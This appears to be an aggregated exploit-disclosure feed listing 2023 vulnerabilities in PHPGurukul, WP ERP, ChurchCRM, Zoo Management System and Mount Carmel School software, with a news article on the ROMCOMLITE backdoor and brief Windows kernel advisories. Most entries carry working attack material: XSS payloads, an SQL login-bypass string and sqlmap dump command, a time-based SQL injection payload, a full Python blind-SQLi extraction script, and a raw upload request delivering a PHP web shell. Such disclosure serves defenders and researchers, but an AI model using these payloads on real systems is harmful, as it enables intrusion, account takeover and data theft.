Cross Site Scripting (XSS) vulnerability in Phpgurukul User Registration & Login and User Management System With admin panel 3.0 allows attackers to run arbitrary code via fname, lname, email, and contact fields of the user registration page.

    # Exploit Title: User Registration & Login and User Management System v3.0 - Stored Cross-Site Scripting (XSS)
    # Google Dork: NA
    # Date: 19/08/2023
    # Exploit Author: Ashutosh Singh Umath
    # Vendor Homepage: https://phpgurukul.com
    # Software Link: https://phpgurukul.com/user-registration-login-and-user-management-system-with-admin-panel/
    # Version: 3.0
    # Tested on: Windows 11
    # CVE : Requested
    
    
    Description
    
    User Registration & Login and User Management System With admin panel 3.0 application from PHPgurukul is vulnerable to
    Persistent XSS via the fname, lname, email, and contact field name. When User logs in or the admin user logs in the payload gets executed.
    
    POC
    
    User side
    1. Go to the user registration page http://localhost/loginsystem.
    2. Enter <img src="x" onerror=alert(document.cookie)> in one of the
    fields (first name, last name, email, or contact).
    3. Click sign up.
    
    Admin side
    1. Login to admin panel http://localhost/loginsystem/admin.
    2. After login successfully go to manage user page.
    3. Payload
    
    
    Thanks and Regards,
    
    Ashutosh Singh Umath

CVE-2023-40851: OffSec’s Exploit Database Archive

SQL Injection vulnerability in Phpgurukul User Registration & Login and User Management System With admin panel 3.0 allows attackers to obtain sensitive information via crafted string in the admin user name field on the admin log in page.

    # Exploit Title: User Registration & Login and User Management System v3.0 - SQL Injection (Unauthenticated)
    # Google Dork: NA
    # Date: 19/08/2023
    # Exploit Author: Ashutosh Singh Umath
    # Vendor Homepage: https://phpgurukul.com
    # Software Link:
    https://phpgurukul.com/user-registration-login-and-user-management-system-with-admin-panel/
    # Version: 3.0
    # Tested on: Windows 11
    # CVE : Requested
    
    
    Proof Of Concept:
    
    1. Navigate to the admin login page.
    
    URL: http://192.168.1.5/loginsystem/admin/
    
    2. Enter "*admin' -- -*" in the admin username field and anything
    random in the password field.
    
    3. Now you successfully logged in as admin.
    
    4. To download all the data from the database, use the below commands.
    
      4.1. Login to the admin portal and capture the request.
    
      4.2. Copy the intercepted request in a file.
    
      4.3. Now use the below command to dump all the data
    
    
    Command:  sqlmap -r <file-name> -p username -D loginsystem --dump-all
    
    
    
    Thanks and Regards,
    
    Ashutosh Singh Umath

CVE-2023-40852: OffSec’s Exploit Database Archive

By Deeba Ahmed
Watch out, ladies!
This is a post from HackRead.com Read the original post: ROMCOMLITE: Stealthier Version of ROMCOM Backdoor Targets Female Politicians

*   **Japanese cybersecurity firm **Trend Micro**** **has detected a new malware attack campaign** **dubbed ROMCOMLITE.**

*   **Cyberespionage gang Void Rabisu is targeting female Politicians and government officials. with the new ROMCOM backdoor variant**.

*   **This new variant is compact and stealthier than its predecessor.**

*   **Attackers are using spear-phishing to distribute the backdoor through fake meeting invites.**

*   **If the malware invades a system successfully, it can harvest data, execute remote commands, or capture screenshots.**

A notorious cyberespionage group Void Rabisu, aka Storm-0978, Tropical Scorpius, and UNC2596, has launched a brand-new campaign targeting female political leaders and government officials using a revamped version of a previously detected ROMCOM backdoor.

Hackread.com had reported in July 2023 that Void Rabisu is intensifying its efforts to target politicians, citing a report from the BlackBerry Threat Research and Intelligence team about discovering a campaign where the group targeted Ukraine and NATO supporters with the ROMCOM backdoor RAT delivered via malicious documents.

The ROMCOMLITE campaign was discovered by Japanese cybersecurity firm Trend Micro. This new variant, dubbed ROMCOM 4.0 by Trend Micro and Peapod by Microsoft, allows attackers to gain unauthorized access to the target’s computers and steal sensitive data.

The backdoor was detected in early August, and the malware analysis was published on 31 October. In the report, Feike Hacquebord and Fernando Merces explained that Void Rabisu’s targets were attendees of the Women Political Leaders (WPL) Summit held in Brussels in June 2023.

For your information, Void Rabisu is a sophisticated, hybrid group that conducts espionage and financially motivated attacks and prefers using the Cuba ransomware. It also serves as an APT actor targeting government and military entities/officials.

The gang was discovered first in 2022, but researchers agree that it has been active for a long time. They also suspect this group harbours a geopolitical agenda, as most of its previous campaigns targeted the Ukrainian government/military and EU political/government governments.

In the recent campaign, Trend Micro noted that the backdoor payload was embedded in a malicious copy of the WPL Summit’s official website to improve gender equality in politics. The malicious new backdoor ROMCOM 4.0 is designed to evade detection and remain hidden on the infected system to avoid raising suspicion.

As per the report, the Videos &photos link of the original domain redirects the visitor to a Google Drive folder containing the event’s photographs. Then the fake website (wplsummitcom) directs the visitor to a OneDrive folder containing two compressed files and an executable file (titled: Unpublished Pictures 1-20230802T122531-002-sfx.exe), which is malware.

The gang created this fake website on 8 August, primarily to attract visitors from the original WPL summit domain. The executable file is signed with a valid certificate by a firm called Elbor LLC and extracts 56 photos from its resource section after the user clicks on Extract.

Fake Malicious Website for the WPL Summit 2023 and the folder downloaded by clicking on the ‘Videos & Photos’ contains images and malware downloader (Screenshot Credit: Trend Micro)

Pictures dropped by the malware downloader from the event – According to Trend Micro, these images have been gathered by hackers from different social media posts.

Attackers use spear-phishing tactics to lure their targets. They send fake meeting invitations and other lures so that the targets open malicious attachments or click on links containing the malware.

This is a similar tactic Void Rabisu has used in its campaign discovered in June 2023, where the gang used lures related to the Ukrainian World Congress and the July NATO summit to deliver a zero-day exploit based on an RCE vulnerability in MS Office and Windows HTML, tracked as CVE-2023-36884. Microsoft disclosed this campaign in July.

However, Trend Micro report reveals that the group has used a new tactic in this campaign involving TLS-enforcing by the RomCom C2 servers to make discovering ROMCOM’s infrastructure hard to detect.

“We observed Void Rabisu using this technique in a May 2023 RomCom campaign that spread a malicious copy of the legitimate PaperCut software, in which the C2 server ignored requests that were not conformant,” the report read.

Trend Micro claims there’s no evidence to believe Void Rabisu is a state-sponsored actor. Still, it is clear that the group is trying to benefit from the “extraordinary geopolitical circumstances caused by the war in Ukraine.”

****_RELATED ARTICLES_****

1.  Hackers Target Israeli Rocket Alert App Users with Spyware
2.  Gender Diversity in Cybercrime Forums: Women Users on the Rise
3.  Israeli Rabbi arrested for hacking CCTV cameras at women’ bathing suit shop

ROMCOMLITE: Stealthier Version of ROMCOM Backdoor Targets Female Politicians

The Microsoft Windows Kernel suffers from out-of-bounds reads and paged pool memory disclosure in VrpUpdateKeyInformation.

Microsoft Windows Kernel Out-Of-Bounds Reads / Memory Disclosure

The Microsoft Windows Kernel suffers from a paged pool memory disclosure in VrpPostEnumerateKey.

Microsoft Windows Kernel Paged Pool Memory Disclosure

WordPress WP ERP plugin versions 1.12.2 and below suffer from a remote SQL injection vulnerability.

    # Exploit Title: WP Plugins WP ERP <= 1.12.2 - SQL Injection# Date: 15-10-2023# Exploit Author: Arvandy# Software Link: https://wordpress.org/plugins/erp/# Vendor Homepage: https://wperp.com/# Version: 1.12.2# Tested on: Windows, Linux# CVE: CVE-2023-2744# Product DescriptionWP ERP is the first full-fledged ERP (Enterprise Resource Planning) system through which you can simultaneously manage your WordPress site and business from a single platform. WP ERP aims to deliver all your enterprise business requirements with simplicity. With real-time reports and a better way to handle business data, make your operation better managed, away from errors, and prepare your company for the next leap. WP ERP has 3 core modules: HR, CRM, and Accounting, which together make a complete ERP system for any type of business.# Vulnerability overview:The WordPress Plugins WP ERP - Accounting module <= 1.12.2 is vulnerable to Blind SQL Injection (time-based) via the TYPE parameter on /wp-json/erp/v1/accounting/v1/people endpoint. This vulnerability could lead to unauthorized data access and modification.# Proof of Concept:Affected Endpoint: /wp-json/erp/v1/accounting/v1/people?type=Affected Parameter: typepayload: customer') AND (SELECT 1 FROM (SELECT SLEEP(3))x) AND ('x'='x# RecommendationUpgrade to version 1.12.4

WordPress WP ERP 1.12.2 SQL Injection

ChurchCRM version 4.5.4 suffers from a remote authenticated blind SQL injection vulnerability.

    # Exploit Title: ChurchCRM 4.5.4 - Authenticated Blind SQL Injection via the EN_tyid# Date: 03-05-2023# Exploit Author: Arvandy# Blog Post: https://github.com/arvandy/CVE/blob/main/CVE-2023-29842/CVE-2023-29842.md# Software Link: https://github.com/ChurchCRM/CRM/releases# Vendor Homepage: http://churchcrm.io/# Version: 4.5.4# Tested on: Windows, Linux# CVE: CVE-2023-29842"""The endpoint /EditEventTypes.php is vulnerable to Blind SQL Injection (Time-based) via the EN_tyid POST parameter.This endpoint can be triggered through the following menu: Events - List Event Types - Edit Event Types - Save Name. The EN_tyid Parameter is taken directly from the user input and passed into the SQL query without any sanitization or input escaping. This allows the attacker to inject malicious Event payloads to execute the malicious SQL query.This script is created as Proof of Concept to retrieve the database name and version."""import sys, requestsdef injection(target, inj_str, session_cookies):        for j in range(32, 126):        url = "%s/EditEventTypes.php" % (target)        headers = {'Content-Type':'application/x-www-form-urlencoded','Cookie':'CRM-2c90cf299230a50dab55aee824ed9b08='+str(session_cookies)}            data = "EN_tyid=%s&EN_ctid=&newEvtName=NewEvent&Action=NAME&newEvtStartTime=09:30:00&newCountName=" % (inj_str.replace("[CHAR]", str(j)))        r = requests.post(url, headers=headers, data=data)        res = r.text        if (r.elapsed.total_seconds () > 2 ):            return j    return Nonedef retrieveDBName(session_cookies):       db_name = ""    print("(+) Retrieving database name, please wait")    for i in range (1,100):        injection_str = "1'+UNION+SELECT+NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,IF(ASCII(SUBSTRING((SELECT+DATABASE()),%d,1))=[CHAR],SLEEP(2),null)-- -" % i        retrieved_value = injection(target, injection_str, session_cookies)        if (retrieved_value):            sys.stdout.write(chr(retrieved_value))            sys.stdout.flush()                   else:            breakdef retrieveDBVersion(session_cookies):       db_version = ""    print("(+) Retrieving database version, please wait")    for i in range (1,100):        injection_str = "1'+UNION+SELECT+NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,IF(ASCII(SUBSTRING((SELECT+@@version),%d,1))=[CHAR],SLEEP(2),null)-- -" % i        retrieved_value = injection(target, injection_str, session_cookies)        if (retrieved_value):            sys.stdout.write(chr(retrieved_value))            sys.stdout.flush()        else:            break    def login(target, username, password):    target = "%s/session/begin" % (target)    headers = {'Content-Type': 'application/x-www-form-urlencoded'}    data = "User=%s&Password=%s" % (username, password)    s = requests.session()    r = s.post(target, data = data, headers = headers)    return s.cookies.get('CRM-2c90cf299230a50dab55aee824ed9b08')def main():    print("(!) Login to the target application")    session_cookies = login(target, username, password)               print("(!) Exploiting the Blind Auth SQL Injection to retrieve database name and versions")    retrieveDBName(session_cookies)        print("")    retrieveDBVersion(session_cookies)    if __name__ == "__main__":    if len(sys.argv) != 4:        print("(!) Usage: python3 exploit.py <URL> <username> <password>")        print("(!) E.g.,: python3 exploit.py http://192.168.1.100/ChurchCRM user pass")        sys.exit(-1)    target = sys.argv[1]    username = sys.argv[2]    password = sys.argv[3]        main()

ChurchCRM 4.5.4 SQL Injection

Zoo Management System version 1.0 suffers from a remote shell upload vulnerability. This version originally had a shell upload vulnerability discovered by D4rkP0w4r that leveraged the upload CV flow but this particular finding leverages the save_animal flow.

# Exploit Title: Zoo Management System 1.0 - Unauthenticated RCE  
# Date: 16.10.2023  
# Exploit Author: Çağatay Ceyhan  
# Vendor Homepage: https://www.sourcecodester.com/php/15347/zoo-management-system-source-code-php-mysql-database.html#google_vignette  
# Software Link: https://www.sourcecodester.com/download-code?nid=15347&title=Zoo+Management+System+source+code+in+PHP+with+MySQL+Database  
# Version: 1.0  
# Tested on: Windows 11

## Unauthenticated users can access /zoomanagementsystem/admin/public_html/save_animal address and they can upload malicious php file instead of animal picture image without any authentication.

POST /zoomanagementsystem/admin/public_html/save_animal HTTP/1.1  
Host: localhost  
Content-Length: 6162  
Cache-Control: max-age=0  
sec-ch-ua: "Chromium";v="117", "Not;A=Brand";v="8"  
sec-ch-ua-mobile: ?0  
sec-ch-ua-platform: "Windows"  
Upgrade-Insecure-Requests: 1  
Origin: http://localhost  
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary8NY8zT5dXIloiUML  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7  
Sec-Fetch-Site: same-origin  
Sec-Fetch-Mode: navigate  
Sec-Fetch-User: ?1  
Sec-Fetch-Dest: document  
Referer: http://localhost/zoomanagementsystem/admin/public_html/save_animal  
Accept-Encoding: gzip, deflate, br  
Accept-Language: en-US,en;q=0.9  
Connection: close

------WebKitFormBoundary8NY8zT5dXIloiUML  
Content-Disposition: form-data; name="animal_id"

------WebKitFormBoundary8NY8zT5dXIloiUML  
Content-Disposition: form-data; name="an_given_name"

kdkd  
------WebKitFormBoundary8NY8zT5dXIloiUML  
Content-Disposition: form-data; name="an_species_name"

ıdsıd  
------WebKitFormBoundary8NY8zT5dXIloiUML  
Content-Disposition: form-data; name="an_dob"

1552-02-05  
------WebKitFormBoundary8NY8zT5dXIloiUML  
Content-Disposition: form-data; name="an_gender"

m  
------WebKitFormBoundary8NY8zT5dXIloiUML  
Content-Disposition: form-data; name="an_avg_lifespan"

3  
------WebKitFormBoundary8NY8zT5dXIloiUML  
Content-Disposition: form-data; name="class_id"

2  
------WebKitFormBoundary8NY8zT5dXIloiUML  
Content-Disposition: form-data; name="location_id"

2  
------WebKitFormBoundary8NY8zT5dXIloiUML  
Content-Disposition: form-data; name="an_dietary_req"

2  
------WebKitFormBoundary8NY8zT5dXIloiUML  
Content-Disposition: form-data; name="an_natural_habitat"

faad  
------WebKitFormBoundary8NY8zT5dXIloiUML  
Content-Disposition: form-data; name="an_pop_dist"

eterter  
------WebKitFormBoundary8NY8zT5dXIloiUML  
Content-Disposition: form-data; name="an_joindate"

5559-02-06  
------WebKitFormBoundary8NY8zT5dXIloiUML  
Content-Disposition: form-data; name="an_height"

2  
------WebKitFormBoundary8NY8zT5dXIloiUML  
Content-Disposition: form-data; name="an_weight"

3  
------WebKitFormBoundary8NY8zT5dXIloiUML  
Content-Disposition: form-data; name="an_description"

------WebKitFormBoundary8NY8zT5dXIloiUML  
Content-Disposition: form-data; name="images[]"; filename="ultra.php"  
Content-Type: application/octet-stream

<?php  
if (!empty($_POST['cmd'])) {  
    $cmd = shell_exec($_POST['cmd']);  
}  
?>  
<!DOCTYPE html>  
<html lang="en">  
<head>  
    <meta charset="utf-8">  
    <meta http-equiv="X-UA-Compatible" content="IE=edge">  
    <meta name="viewport" content="width=device-width, initial-scale=1">  
    <title>Web Shell</title>  
    <style>  
        * {  
            -webkit-box-sizing: border-box;  
            box-sizing: border-box;  
        }

        body {  
            font-family: sans-serif;  
            color: rgba(0, 0, 0, .75);  
        }

        main {  
            margin: auto;  
            max-width: 850px;  
        }

        pre,  
        input,  
        button {  
            padding: 10px;  
            border-radius: 5px;  
            background-color: #efefef;  
        }

        label {  
            display: block;  
        }

        input {  
            width: 100%;  
            background-color: #efefef;  
            border: 2px solid transparent;  
        }

        input:focus {  
            outline: none;  
            background: transparent;  
            border: 2px solid #e6e6e6;  
        }

        button {  
            border: none;  
            cursor: pointer;  
            margin-left: 5px;  
        }

        button:hover {  
            background-color: #e6e6e6;  
        }

        .form-group {  
            display: -webkit-box;  
            display: -ms-flexbox;  
            display: flex;  
            padding: 15px 0;  
        }  
    </style>

</head>

<body>  
    <main>  
        <h1>Web Shell</h1>  
        <h2>Execute a command</h2>

        <form method="post">  
            <label for="cmd"><strong>Command</strong></label>  
            <div class="form-group">  
                <input type="text" name="cmd" id="cmd" value="<?= htmlspecialchars($_POST['cmd'], ENT_QUOTES, 'UTF-8') ?>"  
                       onfocus="this.setSelectionRange(this.value.length, this.value.length);" autofocus required>  
                <button type="submit">Execute</button>  
            </div>  
        </form>

        <?php if ($_SERVER['REQUEST_METHOD'] === 'POST'): ?>  
            <h2>Output</h2>  
            <?php if (isset($cmd)): ?>  
                <pre><?= htmlspecialchars($cmd, ENT_QUOTES, 'UTF-8') ?></pre>  
            <?php else: ?>  
                <pre><small>No result.</small></pre>  
            <?php endif; ?>  
        <?php endif; ?>  
    </main>  
</body>  
</html>  
------WebKitFormBoundary8NY8zT5dXIloiUML  
Content-Disposition: form-data; name="an_med_record"

------WebKitFormBoundary8NY8zT5dXIloiUML  
Content-Disposition: form-data; name="an_transfer"

------WebKitFormBoundary8NY8zT5dXIloiUML  
Content-Disposition: form-data; name="an_transfer_reason"

------WebKitFormBoundary8NY8zT5dXIloiUML  
Content-Disposition: form-data; name="an_death_date"

------WebKitFormBoundary8NY8zT5dXIloiUML  
Content-Disposition: form-data; name="an_death_cause"

------WebKitFormBoundary8NY8zT5dXIloiUML  
Content-Disposition: form-data; name="an_incineration"

------WebKitFormBoundary8NY8zT5dXIloiUML  
Content-Disposition: form-data; name="m_gest_period"

------WebKitFormBoundary8NY8zT5dXIloiUML  
Content-Disposition: form-data; name="m_category"

------WebKitFormBoundary8NY8zT5dXIloiUML  
Content-Disposition: form-data; name="m_avg_body_temp"

------WebKitFormBoundary8NY8zT5dXIloiUML  
Content-Disposition: form-data; name="b_nest_const"

------WebKitFormBoundary8NY8zT5dXIloiUML  
Content-Disposition: form-data; name="b_clutch_size"

------WebKitFormBoundary8NY8zT5dXIloiUML  
Content-Disposition: form-data; name="b_wingspan"

------WebKitFormBoundary8NY8zT5dXIloiUML  
Content-Disposition: form-data; name="b_color_variant"

------WebKitFormBoundary8NY8zT5dXIloiUML  
Content-Disposition: form-data; name="f_body_temp"

------WebKitFormBoundary8NY8zT5dXIloiUML  
Content-Disposition: form-data; name="f_water_type"

------WebKitFormBoundary8NY8zT5dXIloiUML  
Content-Disposition: form-data; name="f_color_variant"

------WebKitFormBoundary8NY8zT5dXIloiUML  
Content-Disposition: form-data; name="rep_type"

------WebKitFormBoundary8NY8zT5dXIloiUML  
Content-Disposition: form-data; name="clutch_size"

------WebKitFormBoundary8NY8zT5dXIloiUML  
Content-Disposition: form-data; name="num_offspring"

------WebKitFormBoundary8NY8zT5dXIloiUML  
Content-Disposition: form-data; name="submit"

------WebKitFormBoundary8NY8zT5dXIloiUML--

## After the post request sent by an attacker, the malicious file can be seen under the http://localhost/zoomanagementsystem/img/animals/. the attacker can execute arbitrary command on http://localhost/zoomanagementsystem/img/animals/ultra_1697442648.php.

Zoo Management System 1.0 Shell Upload

2023 Mount Carmel School version 6.4.1 suffers from a cross site scripting vulnerability.

## Title: 2023-Mount-Carmel-School-6.4.1 XSS-Reflected - User Interaction  
## Author: nu11secur1ty  
## Date: 10/14/2023  
## Vendor: https://smart-school.in/  
## Software: https://demo.smart-school.in/site/userlogin#  
## Reference: https://portswigger.net/kb/issues/00200300_cross-site-scripting-reflected

## Description:  
The user can manipulate the system by injecting an HTML code into the  
system without any restriction.  
The function apply_leave is not sanitizing correctly. This could allow  
the user to inject this  
application by using HTML or Java Script with very malicious purposes etc...

STATUS: HIGH- Vulnerability

[+]Exploit:  
```HTML  
POST /user/apply_leave/add HTTP/1.1  
Host: demo.smart-school.in  
Cookie: ci_session=495u2fpup87iml75p4us2uuqgqkpsof9  
Content-Length: 1492  
Sec-Ch-Ua: "Chromium";v="117", "Not;A=Brand";v="8"  
Accept: application/json, text/javascript, */*; q=0.01  
Content-Type: multipart/form-data;  
boundary=----WebKitFormBoundary5wuzslDN9siOCW0K  
X-Requested-With: XMLHttpRequest  
Sec-Ch-Ua-Mobile: ?0  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)  
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132  
Safari/537.36  
Sec-Ch-Ua-Platform: "Windows"  
Origin: https://demo.smart-school.in  
Sec-Fetch-Site: same-origin  
Sec-Fetch-Mode: cors  
Sec-Fetch-Dest: empty  
Referer: https://demo.smart-school.in/user/apply_leave  
Accept-Encoding: gzip, deflate, br  
Accept-Language: en-US,en;q=0.9  
Connection: close

------WebKitFormBoundary5wuzslDN9siOCW0K  
Content-Disposition: form-data; name="homework_id"

------WebKitFormBoundary5wuzslDN9siOCW0K  
Content-Disposition: form-data; name="apply_date"

10/14/2023  
------WebKitFormBoundary5wuzslDN9siOCW0K  
Content-Disposition: form-data; name="from_date"

09/27/2023  
------WebKitFormBoundary5wuzslDN9siOCW0K  
Content-Disposition: form-data; name="to_date"

09/29/2023  
------WebKitFormBoundary5wuzslDN9siOCW0K  
Content-Disposition: form-data; name="leave_id"

------WebKitFormBoundary5wuzslDN9siOCW0K  
Content-Disposition: form-data; name="message"

<a href="https://www.youtube.com/watch?v=yPuC4Cy2ZuI" target="_blank"  
rel="noopener nofollow ugc">  
<img src="https://raw.githubusercontent.com/nu11secur1ty/XSSight/master/nu11secur1ty/images/chalga-tochilka.gif"  
style="border:1px solid black;max-width:100%;" alt="Photo of Byron  
Bay, one of Australia's best beaches!">  
------WebKitFormBoundary5wuzslDN9siOCW0K  
Content-Disposition: form-data; name="files[]"; filename="kurec.svg"  
Content-Type: image/svg+xml

<?xml version="1.0" standalone="no"?>  
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN"  
"http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">  
   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900"  
stroke="#004400"/>  
   <script type="text/javascript">  
      alert(document.cookie);  
   </script>  
</svg>

------WebKitFormBoundary5wuzslDN9siOCW0K--

```

## Reproduce:  
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/smart-school.in/2023/Mount-Carmel-School-6.4.1)

## Proof and Exploit:  
[href](https://www.nu11secur1ty.com/2023/10/2023-mount-carmel-school-641-xss.html)

## Time spent:  
00:37:00

2023 Mount Carmel School 6.4.1 Cross Site Scripting

The Microsoft Windows Kernel passes user-mode pointers to registry callbacks, leading to race conditions and memory corruption.

Tag

#windows